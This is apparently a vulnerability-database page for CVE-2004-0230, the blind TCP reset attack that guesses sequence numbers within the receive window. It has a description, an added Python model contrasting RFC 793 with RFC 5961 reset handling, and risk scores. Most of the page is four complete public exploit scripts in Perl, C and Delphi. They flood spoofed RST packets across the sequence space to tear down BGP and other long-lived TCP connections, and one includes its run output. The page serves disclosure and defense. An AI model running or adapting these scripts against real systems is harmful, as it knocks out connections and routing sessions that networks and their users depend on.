CVE-2004-0230

VIR risk: 1.0

Description

TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP.
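Added example (not part of this CVE record, nor code from any of the proof-of-concepts listed below): a Python model of the receiver-side RST acceptance check, contrasting the RFC 793 in-window rule that makes a blind reset feasible with the RFC 5961 exact-match / challenge-ACK rule that mitigates it, together with the guess-count arithmetic behind "large Window Size". The receiver state values are constructed.

```python
# Added example: model of a TCP receiver's RST acceptance check (RFC 793 vs RFC 5961)
# and the sequence-space coverage arithmetic that a large window hands an attacker.
# Not taken from this CVE record or from any PoC; sample receiver state is constructed.
from dataclasses import dataclass
from typing import Callable

SEQ_SPACE = 1 << 32  # TCP sequence numbers are 32-bit and wrap modulo 2^32


@dataclass
class Receiver:
    rcv_nxt: int  # next sequence number the receiver expects (RCV.NXT)
    rcv_wnd: int  # advertised receive window in bytes (RCV.WND)


def in_window(seq: int, rx: Receiver) -> bool:
    """RFC 793 acceptability test: RCV.NXT <= SEG.SEQ < RCV.NXT + RCV.WND (mod 2^32)."""
    return (seq - rx.rcv_nxt) % SEQ_SPACE < rx.rcv_wnd


def rst_rfc793(seq: int, rx: Receiver) -> str:
    """Pre-mitigation behaviour: any RST whose SEQ lands anywhere in the window tears
    the connection down, so the attacker only has to land in a window-sized slot."""
    return "reset" if in_window(seq, rx) else "drop"


def rst_rfc5961(seq: int, rx: Receiver) -> str:
    """RFC 5961 section 3.2: reset only on an exact SEQ == RCV.NXT match. An in-window
    but inexact RST gets a challenge ACK; the genuine peer answers it with a correctly
    sequenced RST, a blind spoofer never sees it. Out-of-window RSTs are dropped."""
    if seq == rx.rcv_nxt:
        return "reset"
    if in_window(seq, rx):
        return "challenge-ack"
    return "drop"


def guesses_to_cover(window: int) -> int:
    """Spoofed segments needed so that one SEQ falls into every possible window
    position: ceil(2^32 / window). With a 65536-byte window that is only 65536."""
    return -(-SEQ_SPACE // window)


def blind_rst_walk(rx: Receiver, step: int,
                   policy: Callable[[int, Receiver], str]) -> dict:
    """Walk the sequence space from 0 in increments of `step` and report after how
    many segments a receiver using `policy` resets (None if never), plus how many
    challenge ACKs it emitted: a burst of those is an observable signal for defenders."""
    seq, challenge_acks = 0, 0
    for sent in range(1, guesses_to_cover(step) + 1):
        verdict = policy(seq, rx)
        if verdict == "reset":
            return {"reset_after": sent, "challenge_acks": challenge_acks}
        if verdict == "challenge-ack":
            challenge_acks += 1
        seq = (seq + step) % SEQ_SPACE
    return {"reset_after": None, "challenge_acks": challenge_acks}


if __name__ == "__main__":
    rx = Receiver(rcv_nxt=1_000_000_123, rcv_wnd=65535)  # constructed sample state
    for w in (3_000, 16_384, 65_535):
        print(f"window {w:>6}: {guesses_to_cover(w):>8} guesses sweep the whole space")
    print("RFC 793 receiver :", blind_rst_walk(rx, 65535, rst_rfc793))
    print("RFC 5961 receiver:", blind_rst_walk(rx, 65535, rst_rfc5961))
```

With the sample state the RFC 793 receiver resets after 15261 segments, while the RFC 5961 receiver never does and emits exactly one challenge ACK for the single in-window guess.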

Predictions

Exploit likelihood: 55%

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-24031 remote multiple verified text · 3 KB
Paul A. Watson · 2004-04-20

Multiple Vendor - TCP Sequence Number Approximation (2)

text exploit Source: Exploit-DB
source: https://www.securityfocus.com/bid/10183/info
 
A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.
 
The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port.
 
A few factors may present viable target implementations, such as implementations that:
 
- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports.
 
Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms.
 
Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further.
 
Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed.
 
Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

#!/usr/bin/perl
#
# Rich's BGP DOS!
# version .02
# Sends out RST flood to DOS BGP Connections
#
# Requires getopts.pl and Net::RawIP (http://www.ic.al.lg.ua/~ksv/)
#
#For this to work you must do a preceding scan to figure out what the source port and sequence number should be!
#Cisco routers have a magic source port after reboot and all subsequent source ports are incremented by 1 or 512 depending on IOS
#And also find out the hops to set the ttl w/ traceroute.  Per the RFC, the TTL must be 1 when it arrives at the router.
#
#

require 'getopts.pl';
use Net::RawIP;
Getopts('s:p:d:t:x');
$a = new Net::RawIP;
die "Usage $0 -s <spoofed source> -p <source port> -d <destination> -t <ttl>" unless ($opt_s && $opt_p && $opt_d && $opt_t);

$count=0;

while ($count < 4294967296) {

#Increment the count
                $count=$count + 16384;

#Create IP packet!
                $a->set({ ip => 
                        {saddr => $opt_s,
                        daddr => $opt_d,
                        ttl => $opt_t
                        },
#Another TCP port could be specified here to do DOSes on other TCP services.  BGP is 179
                        tcp=> {dest => 179,
                        source => $opt_p,
                        window =>  16384,
                        seq => $count,
                        rst => 1}
                        });
#Send it out!
                $a->send;
}
EDB-24033 remote multiple verified text · 7 KB
K-sPecial · 2004-04-23

Multiple Vendor - TCP Sequence Number Approximation (4)

text exploit Source: Exploit-DB
source: https://www.securityfocus.com/bid/10183/info

use Net::RawIP;
## Kreator -> K-sPecial [http://xzziroz.freeshell.org]
## Date -> 4-23-2004
## Name -> Kreset.pl
## Version -> 1.0
##
## Use -> Used to reset a TCP connecting.
## (Using the slipping through the window method described on 4-20-04)
## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm
##
## Usage -> If you don't fuckin know how to use it, don't use it.
##
## Other -> I played around on nix for a few hours to get the idea down
## pat. I set up an IRCD and connected to it, looked at tcpdump to
## get irssi's local port. irssi's window size was larger so I figured
## i would pretend to be sending RST from server, irssi window 
## was around
## 30K while ircd window around 3K, big difference :D. So I enter values
## and since the connection is loop back, i used 0.0 seconds between
## packets.
## it only took a few minutes to disconnect with a 0.0 overlay and
## a 30K window starting at sequence number 0. Only problem over
## the internet, is finding the port of each side, sure you know the
## servers port but not the clients. I got to sequence number 1512500
## using a .10 second delay and a window size of 2500. Sequence 
## numbers are 
## 32 bit numbers, 32 1's comes out to be 4294967295. 
## Do the math, and you know precisely how long it takes to cover
## every sequence RANGE of a given port using a given window size.
## Window sizes should be based on application layer program.
##
## NOTE -> This script assumes you know at least one of the ports, 
## if the case is otherwise
## then the script can easily be modified to work around this. Also,
## this was written for
## UNIX variants.

print <<EOF;
-> Kreset.pl by K-sPecial [4-23-2004]
-> Used to reset a connection based on the slipping
-> through the window method, exploited publicly on 4-20-2004.
-> [http://xzziroz.freeshell.org]
-> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey
-> eightball, unmanarc, Buuyo^, and whomever else I forgot. 
EOF

print "\r\nDo you want a port range for the source IP, or the dest IP?";
print "\r\nIf you want it for the source, type 1, otherwise 2.";
print "\r\nIf you don't want it for either, type one or the other: ";
chomp (my $choice = <STDIN>);
unless ($choice == 1 || $choice == 2) { 
	print "\r\nEnter 1, or 2.\r\n";
	exit(1);
}
print "\r\nEnter source IP: ";
chomp (my $sip = <STDIN>);
if ($choice == 2) { 
	print "\r\nEnter source port: ";
	chomp ($sport = <STDIN>);
	if (!($sport)) { 
		print "\r\nYou must fill in a source port.\r\n";
		exit(1);
	}
}
print "\r\nEnter dest IP: ";
chomp (my $dip = <STDIN>);
if ($choice == 1) { 
	print "\r\nEnter dest port: ";
	chomp ($dport = <STDIN>);
	if (!($dport)) { 
		print "\r\nYou must fill in a destination port.\r\n";
		exit(1);
	}
}
print "\r\nEnter begin port: ";
chomp (my $bport = <STDIN>);
print "\r\nEnter end port: ";
chomp (my $eport = <STDIN>);
if (!($sip) || !($dip) || !($bport) || !($eport)) {
	print "\r\nYou forgot to fill in one or more fields.\r\n";
	exit(1); ## Yea hahah we don't exit (0) anymore. LOL
}
print "\r\nDestinations guessed window size,";
print "\r\nIf you don't define this, we will try small (2500): ";
chomp (my $winsize = <STDIN>); ## Why did the window cross the road?
if (!($winsize)) {
	$winsize = 2500;
}
print "\r\nStarting sequence number,";
print "\r\nIf you don't define this, we will start at 0: ";
chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers
if (!($seqnum)) {	      ## from getting through!
	$seqnum = 0;
}

print "\r\nNumber of seconds to wait between each packet sent,";
print "\r\nENTER DOTTED DECIMALS HERE PRECEEDED BY A 0 TO";
print "\r\nINDICATE NO MINUTES: 0.10 == 10 ms, 0.0 = 0 ms";
print "\r\nIf you don't define this, we will use 0.10: ";
chomp (my $ms = <STDIN>);
if (!($ms)) {
	$ms = "0.10";
}

print <<EOF;

Source IP is -> $sip
Source port is -> $sport
Destination IP is -> $dip
Guessed window size is -> $winsize
Starting sequence number is -> $seqnum
Loop wait is -> $ms
Begin port is -> $bport
End port is -> $eport
EOF
print "Destination port is -> $dport\r\n" if $dport;
print "Source port is -> $sport\r\n" if $sport;
print "\r\n";

my $i = $seqnum;
## LOOKS WHATS FOLLOWS! WES ARES SO LEETS WITHS OURS SELECTS TRICKSES!
## P.S K-sPecial's hopes yours usings a nix variants or this selects
## tricks just mights nots works.
for ($i; 1; $i += $winsize) { 
	if ($i > 4294967295) { 
		$bport++;
		if ($bport > $eport) { 
			print "Finished\r\n";
			exit(0);
		}
		else {
			print "Looping next port.\r\n";
			$i = $seqnum;
			sleep(2);
			next;
		}
	}
	if ($choice == 2) { 
		$dport = $bport;
	}
	else { 
		$sport = $bport;
	}
	
	select(undef, undef, undef, $ms);
	print "Sequence Number is -> $i port is -> $bport\r\n";

	 $a = new Net::RawIP;
         $a->set({ip => {saddr => "$sip",daddr => "$dip"},
                  tcp => {source => $sport,dest => $dport,rst => 1,
		  syn => 1, seq => $i}}) ;


$a->send;
}
EDB-291 dos linux verified text · 4 KB
Paul A. Watson · 2004-04-23

TCP Connection Reset - Remote Denial of Service

text exploit Source: Exploit-DB
/*
By: Paul A. Watson
Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1

COMPILE:
gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
or
gcc -o reset-tcp reset-tcp.c -lnet
** be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!

EXECUTE:
reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]

EXAMPLE (and timing packets sent with /bin/date):
[root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date
Tue Dec 16 21:18:28 CST 2003
Packets sent: 8192 Sequence guess: 536805376
Packets sent: 16384 Sequence guess: 1073676288
Packets sent: 24576 Sequence guess: 1610547200
Packets sent: 32768 Sequence guess: 2147418112
Packets sent: 40960 Sequence guess: 2684289024
Packets sent: 49152 Sequence guess: 3221159936
Packets sent: 57344 Sequence guess: 3758030848
packets sent: 65535
Tue Dec 16 21:18:46 CST 2003
[root@orc BGP]#
*/

/* modified by: J. Barber A.K.A Swoop
modified to use src mac from your interface and asks for the 
destination mac on the command line.

New Command-Line Example:
./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536

swoopafied: 3/30/04
*/

#include <libnet.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
int c;
unsigned long int count=0;
unsigned long int count2=0;
unsigned long int seqguess=0;
unsigned long int seqstart=0;
unsigned long int seqincrement=0;
unsigned long int seqmax=4294967295;
u_char *cp;
libnet_t *l;
libnet_ptag_t t;
char *payload;
char * device = argv[1];
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];

char sourceip[32] = "";
char destinationip[32] = "";

/* Change these to suit your local environment values */
/* Make enet_dst either the default gateway or destination host */
struct libnet_ether_addr *ptr_enet_src;
u_char enet_src[6];
u_char enet_dst[6];
u_char org_code[3] = {0x00, 0x00, 0x00};

/* Its only test code, so minimal checking is performed... */
if (argc<8) { 
printf("TCP Reset Tool v1.2\nBy Paul Watson - Modified by J. Barber\n");
printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [gateway/destination MAC] [window size]\n",argv[0]); 
printf("Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536\n");
exit(1);
}

strcpy(sourceip,argv[2]);
src_prt = atoi(argv[3]);
strcpy(destinationip,argv[4]);
dst_prt = atoi(argv[5]);
seqincrement= atoi(argv[7]);
seqstart= 0;
seqmax = 4294967295; /* 2^32 */

payload = NULL;
payload_s = 0;
src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);

memset(enet_dst, 0, sizeof(enet_dst));
sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0],
&enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4],
&enet_dst[5]);

l = libnet_init(LIBNET_LINK,device,errbuf);
ptr_enet_src = libnet_get_hwaddr(l);
memcpy(&enet_src[0], ptr_enet_src,6);
printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3],
enet_src[4],enet_src[5]);
printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3],
enet_dst[4],enet_dst[5]);

for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
count++; count2++;
if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
l = libnet_init(LIBNET_LINK,device,errbuf);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);

t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
c = libnet_write(l);
}
printf("packets sent: %i\n",count);
return (EXIT_FAILURE); 
}
EDB-942 dos windows verified
Yuri Gushin · 2005-04-17

Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)

EDB-276 dos windows verified text · 7 KB
Aphex · 2004-04-22

Microsoft Windows XP/2000 - TCP Connection Reset

text exploit Source: Exploit-DB
{
AFX TCP Reset by Aphex
http://www.iamaphex.cjb.net
unremote@knology.net

Compile with Delphi 5/6/7
}

program Project1;

{$APPTYPE CONSOLE}

uses
Windows;

type
TBufferArray = array[0..65535] of byte;

type
iph = record
ip_verlen: byte;
ip_tos: byte;
ip_len: word;
ip_id: word;
ip_offset: word;
ip_ttl: byte;
ip_protocol: byte;
ip_checksum: word;
ip_saddr: longword;
ip_daddr: longword;
end;

tcph = record
th_sport: word;
th_dport: word;
th_seq: longword;
th_ack: longword;
th_len: byte;
th_flags: byte;
th_win: word;
th_checksum: word;
th_upr: word;
end;

sb = packed record
sb1, sb2, sb3, sb4: char;
end;

sw = packed record
sw1, sw2: word;
end;

TInAddr = record
case integer of
0: (ssb: sb);
1: (ssw: sw);
2: (saddr: longint);
end;

TSockAddr = record
case integer of
0: (sin_family: word; sin_port: word; sin_addr: TInAddr; sin_zero: array[0..7] of char);
1: (sa_family: word; sa_data: array[0..13] of char)
end;

TWSAData = record
ver: Word;
hgh: Word;
dsc: array[0..256] of char;
sys: array[0..128] of char;
skt: Word;
udp: Word;
ven: PChar;
end;

function closesocket(sk: integer): integer; stdcall; external 'WS2_32.DLL' name 'closesocket';
function htons(hs: word): word; stdcall; external 'WS2_32.DLL' name 'htons';
function htonl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl';
function ntohl(hs: longint): longint; stdcall; external 'WS2_32.DLL' name 'htonl';
function inet_addr(cp: pchar): longint; stdcall; external 'WS2_32.DLL' name 'inet_addr';
function sendto(sk: integer; var bf; ln, fl: integer; var ad: TSockAddr; le: integer): 
integer; stdcall; external 'WS2_32.DLL' name 'sendto';
function setsockopt(sk: integer; lv, op: integer; ov: PChar; ol: integer): integer; 
stdcall; external 'WS2_32.DLL' name 'setsockopt';
function socket(af, st, pr: integer): integer; stdcall; external 'WS2_32.DLL' name 'socket';
function WSACleanup: integer; stdcall; external 'WS2_32.DLL' name 'WSACleanup';
function WSAGetLastError: integer; stdcall; external 'WS2_32.DLL' name 'WSAGetLastError';
function WSAStartup(vr: word; var ws: TWSAData): integer; stdcall; external 'WS2_32.DLL' name 'WSAStartup';

const
INVALID_SOCKET = integer(not(0));

var
hSocket: integer;
WindowPos: int64;
WindowCount: dword;
WindowSize: dword;
TargetHost: string;
TargetPort: word;
SourceHost: string;
SourcePort: word;
Odds: dword;
Delay: dword;

function CheckSum(var Buffer; Size: integer): word;
type
TWordArray = Array[0..1] of word;
var
lSumm: LongWord;
iLoop: integer;
begin
lSumm := 0;
iLoop := 0;
while Size > 1 do
begin
lSumm := lSumm + TWordArray(Buffer)[iLoop];
inc(iLoop);
Size := Size - SizeOf(word);
end;
if Size = 1 then lSumm := lSumm + Byte(TWordArray(Buffer)[iLoop]);
lSumm := (lSumm shr 16) + (lSumm and $FFFF);
lSumm := lSumm + (lSumm shr 16);
Result := word(not lSumm);
end;

procedure Header(FromIP: string; FromPort: word; ToIP: string; ToPort: word; Seq: longint; 
Window: longint; var Buffer: TBufferArray; var Socket: TSockAddr; var Size: word);
var
ipHdr: iph;
tcpHdr: tcph;
TcpHeaderLen: word;
ChecksumSize: word;
DataPointer: ^byte;
procedure IncPtr(Value: integer);
begin
DataPointer := pointer(integer(DataPointer) + Value);
end;
begin
Size := sizeof(ipHdr) + sizeof(tcpHdr);
ipHdr.ip_verlen := ((4 shl 4) or sizeof(ipHdr) div sizeof(longword));
ipHdr.ip_tos := 0;
ipHdr.ip_len := htons(Size);
ipHdr.ip_id := 0;
ipHdr.ip_offset := 0;
ipHdr.ip_ttl := 128;
ipHdr.ip_protocol := 6;
ipHdr.ip_checksum := 0;
ipHdr.ip_saddr := inet_addr(pchar(FromIP));
ipHdr.ip_daddr := inet_addr(pchar(ToIP));
ChecksumSize := 0;
tcpHdr.th_sport := htons(FromPort);
tcpHdr.th_dport := htons(ToPort);
tcpHdr.th_seq := htonl(Seq);
tcpHdr.th_ack := htonl(Seq + Window);
tcpHdr.th_len := 80;
tcpHdr.th_flags := 20;
tcpHdr.th_win := Window;
tcpHdr.th_checksum := 0;
tcpHdr.th_upr := 0;
DataPointer := @Buffer[0];
FillChar(Buffer, SizeOf(Buffer), 0);
Move(ipHdr.ip_saddr, DataPointer^, SizeOf(ipHdr.ip_saddr));
IncPtr(SizeOf(ipHdr.ip_saddr));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_saddr);
Move(ipHdr.ip_daddr, DataPointer^, sizeof(ipHdr.ip_daddr));
IncPtr(SizeOf(ipHdr.ip_daddr));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_daddr);
IncPtr(1);
Inc(ChecksumSize);
Move(ipHdr.ip_protocol, DataPointer^, sizeof(ipHdr.ip_protocol));
IncPtr(sizeof(ipHdr.ip_protocol));
ChecksumSize := ChecksumSize + sizeof(ipHdr.ip_protocol);
TcpHeaderLen := htons(sizeof(tcpHdr));
Move(TcpHeaderLen, DataPointer^, sizeof(TcpHeaderLen));
IncPtr(sizeof(TcpHeaderLen));
ChecksumSize := ChecksumSize + sizeof(TcpHeaderLen);
Move(tcpHdr, DataPointer^, sizeof(tcpHdr));
IncPtr(sizeof(tcpHdr));
ChecksumSize := ChecksumSize + sizeof(tcpHdr);
tcpHdr.th_checksum := CheckSum(Buffer, ChecksumSize);
FillChar(Buffer, sizeof(Buffer), 0);
DataPointer := @Buffer[0];
Move(ipHdr, DataPointer^, sizeof(ipHdr));
IncPtr(sizeof(ipHdr));
Move(tcpHdr, DataPointer^, sizeof(tcpHdr));
Socket.sin_family := 2;
Socket.sin_port := htons(0);
Socket.sin_addr.saddr := inet_addr(pchar(ToIP));
end;

procedure Send(TargetIP: string; TargetPort: integer; SourceIP: string; SourcePort: integer; 
Sequence: longint; Window: longint);
var
Buffer: TBufferArray;
Sck: TSockAddr;
Size: Word;
begin
Header(SourceIP, SourcePort, TargetIP, TargetPort, Sequence, Window, Buffer, Sck, Size);
SendTo(hSocket, Buffer, Size, 0, Sck, sizeof(Sck));
end;

procedure Init;
var
wsdata: TWSAdata;
op: integer;
begin
WSAStartup($0002, wsdata);
hSocket := Socket(2, 3, 0);
op := 1;
SetSockOpt(hSocket, 0, 2, @op, sizeof(op));
end;

function StrToInt(S: string): integer;
begin
Val(S, Result, Result);
end;

procedure DoExit;
begin
WriteLn('AFX TCP Reset');
WriteLn('http://www.iamaphex.cjb.net');
WriteLn('unremote@knology.net');
WriteLn('');
WriteLn('Usage: reset <src ip> <src port> <dest ip> <dest port> <window size> <send delay> [begin seq num]');
ExitProcess(0);
end;

begin
if Length(ParamStr(1)) < 1 then DoExit;
if Length(ParamStr(2)) < 1 then DoExit;
if Length(ParamStr(3)) < 1 then DoExit;
if Length(ParamStr(4)) < 1 then DoExit;
if Length(ParamStr(5)) < 1 then DoExit;
SourceHost := ParamStr(1);
SourcePort := StrToInt(ParamStr(2));
TargetHost := ParamStr(3);
TargetPort := StrToInt(ParamStr(4));
WindowSize := StrToInt(ParamStr(5));
Delay := StrToInt(ParamStr(6));
Randomize;
WindowPos := Random(4294967295);
if Length(ParamStr(7)) > 0 then WindowPos := StrToInt(ParamStr(7));
Odds := 4294967295 div WindowSize;
WindowCount := 0;
Init;
while WindowCount < Odds do
begin
if WindowPos > 4294967295 then WindowPos := 0;
Send(TargetHost, TargetPort, SourceHost, SourcePort, WindowPos, WindowSize);
Inc(WindowCount);
Inc(WindowPos, WindowSize);
Sleep(Delay);
end;
end.

// milw0rm.com [2004-04-22]
EDB-24030 remote multiple verified
Matt Edman · 2004-03-05

Multiple Vendor - TCP Sequence Number Approximation (1)

EDB-24032 remote multiple verified text · 2 KB
Paul Watson · 2004-04-20

Multiple Vendor - TCP Sequence Number Approximation (3)

text exploit Source: Exploit-DB
source: https://www.securityfocus.com/bid/10183/info

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24032.tgz

OS impact

Debian (5 releases affected; no fixed version listed):
- trixie: Affected
- sid: Affected
- forky: Affected
- bullseye: Affected
- bookworm: Affected

SUSE (1 release affected; release name not listed):
- Affected
